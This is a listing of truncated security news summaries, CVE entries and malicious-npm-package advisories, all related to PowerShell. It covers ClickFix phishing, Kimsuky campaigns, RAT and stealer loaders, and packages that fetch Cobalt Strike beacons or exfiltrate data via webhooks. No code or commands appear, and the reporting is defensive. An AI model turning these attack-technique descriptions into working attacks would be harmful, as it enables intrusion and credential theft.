SMB Windows Full Build Number

Gets the full build number of a Windows operating system using PowerShell via SMB. SPDX-FileCopyrightText: 2025 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only if descripti...

Hackers Use ClickFix Trick to Deploy PowerShell-Based Havoc C2 via SharePoint Sites

Cybersecurity researchers are calling attention to a new phishing campaign that employs the ClickFix technique to deliver an open-source command-and-control C2 framework called Havoc. "The threat actor hides each malware stage behind a SharePoint site and uses a modified version of Havoc Demon in...

5 Active Malware Campaigns in Q1 2025

The first quarter of 2025 has been a battlefield in the world of cybersecurity. Cybercriminals continued launching aggressive new campaigns and refining their attack methods. Below is an overview of five notable malware families, accompanied by analyses conducted in controlled environments...

North Korean APT43 Uses PowerShell and Dropbox in Targeted South Korea Cyberattacks

A nation-state threat actor with ties to North Korea has been linked to an ongoing campaign targeting South Korean business, government, and cryptocurrency sectors. The attack campaign, dubbed DEEPDRIVE by Securonix, has been attributed to a hacking group known as Kimsuky, which is also tracked...

North Korean Hackers Exploit PowerShell Trick to Hijack Devices in New Cyberattack

The North Korea-linked threat actor known as Kimsuky has been observed using a new tactic that involves deceiving targets into running PowerShell as an administrator and then instructing them to paste and run malicious code provided by them. "To execute this tactic, the threat actor masquerades a...

Threat Actors Exploit ClickFix to Deploy NetSupport RAT in Latest Cyber Attacks

Threat actors have observed the increasingly common ClickFix technique to deliver a remote access trojan named NetSupport RAT since early January 2025. NetSupport RAT, typically propagated via bogus websites and fake browser updates, grants attackers full control over the victim's host, allowing...

CVE-2024-11621

Missing certificate validation in Devolutions Remote Desktop Manager on macOS, iOS, Android, Linux allows an attacker to intercept and modify encrypted communications via a man-in-the-middle attack. Versions affected are : Remote Desktop Manager macOS 2024.3.9.0 and earlier Remote Desktop Manager...

Devolutions Remote Desktop Manager 信任管理问题漏洞

Devolutions Remote Desktop Manager is an application from Devolutions Canada Inc. It provides remote desktop management functionality. Devolutions Remote Desktop Manager is vulnerable to a trust management issue that stems from missing certificate validation. The following products and versions a...

North Korean APT Kimsuky Uses forceCopy Malware to Steal Browser-Stored Credentials

The North Korea-linked nation-state hacking group known as Kimsuky has been observed conducting spear-phishing attacks to deliver an information stealer malware named forceCopy, according to new findings from the AhnLab Security Intelligence Center ASEC. The attacks commence with phishing emails...

Silent Lynx Using PowerShell, Golang, and C++ Loaders in Multi-Stage Cyberattacks

A previously undocumented threat actor known as Silent Lynx has been linked to cyber attacks targeting various entities in Kyrgyzstan and Turkmenistan. "This threat group has previously targeted entities around Eastern Europe and Central Asian government think tanks involved in economic decision...

CVE-2024-23464

In certain cases, Zscaler Internet Access ZIA can be disabled by PowerShell commands with admin rights. This affects Zscaler Client Connector on Windows 4.2.1...

Coyote Malware Expands Reach: Now Targets 1,030 Sites and 73 Financial Institutions

Brazilian Windows users are the target of a campaign that delivers a banking malware known as Coyote. "Once deployed, the Coyote Banking Trojan can carry out various malicious activities, including keylogging, capturing screenshots, and displaying phishing overlays to steal sensitive credentials,...

MintsLoader Delivers StealC Malware and BOINC in Targeted Cyber Attacks

Threat hunters have detailed an ongoing campaign that leverages a malware loader called MintsLoader to distribute secondary payloads such as the StealC information stealer and a legitimate open-source network computing platform called BOINC. "MintsLoader is a PowerShell based malware loader that...

Backup or Backup Copy Job for SharePoint, OneDrive, or Teams Data Fails With: "Cannot find object"

Challenge After upgrading Veeam Backup for Microsoft 365 to v8 builds 8.0.2.159 or 8.0.2.200, an incremental backup or a backup copy job protecting SharePoint, OneDrive, or Teams data fails with the error: Cannot find object ... Cause In Object Storage Repositories, the metadata saved for the...

Imperva Protects Against the Exploited CVEs in the Cleo Data Theft Attacks

The Clop ransomware group has once again demonstrated its ability to exploit vulnerabilities to compromise sensitive systems. As Cleo—a managed file transfer provider for businesses—grapples with the aftermath of Clop’s targeted attack on their systems, the spotlight turns to CVE-2024-50623 and...

Malicious code in marked-at (npm)

This package contains a PowerShell download cradle to execute a Cobalt Strike beacon and establish command and control. --- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 2adf9556402c124dc6a1146e6c3bb6a90efee66a9a0bbfdeb3188d4477099d2d Any computer that has this packag...

MAL-2025-616 Malicious code in marked-at (npm)

This package contains a PowerShell download cradle to execute a Cobalt Strike beacon and establish command and control. --- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 2adf9556402c124dc6a1146e6c3bb6a90efee66a9a0bbfdeb3188d4477099d2d Any computer that has this packag...

MAL-2025-617 Malicious code in outlookapi (npm)

The package contains several malicious PowerShell and VBS scripts used to harvest browser data, take screenshots, log keystrokes, and establish startup persistence. It also bundles a password stealer and exfiltrates stolen data via Slack and Discord webhooks. --- -= Per source details. Do not edi...

Hackers Hide Malware in Images to Deploy VIP Keylogger and 0bj3ctivity Stealer

Threat actors have been observed concealing malicious code in images to deliver malware such as VIP Keylogger and 0bj3ctivity Stealer as part of separate campaigns. "In both campaigns, attackers hid malicious code in images they uploaded to archive.org, a file-hosting website, and used the same...

Malicious code in walletcore-gen (npm)

The package contains several malicious PowerShell and VBS scripts used to harvest browser data, take screenshots, log keystrokes, and establish startup persistence. It also bundles a password stealer and exfiltrates stolen data via Slack and Discord webhooks. --- -= Per source details. Do not edi...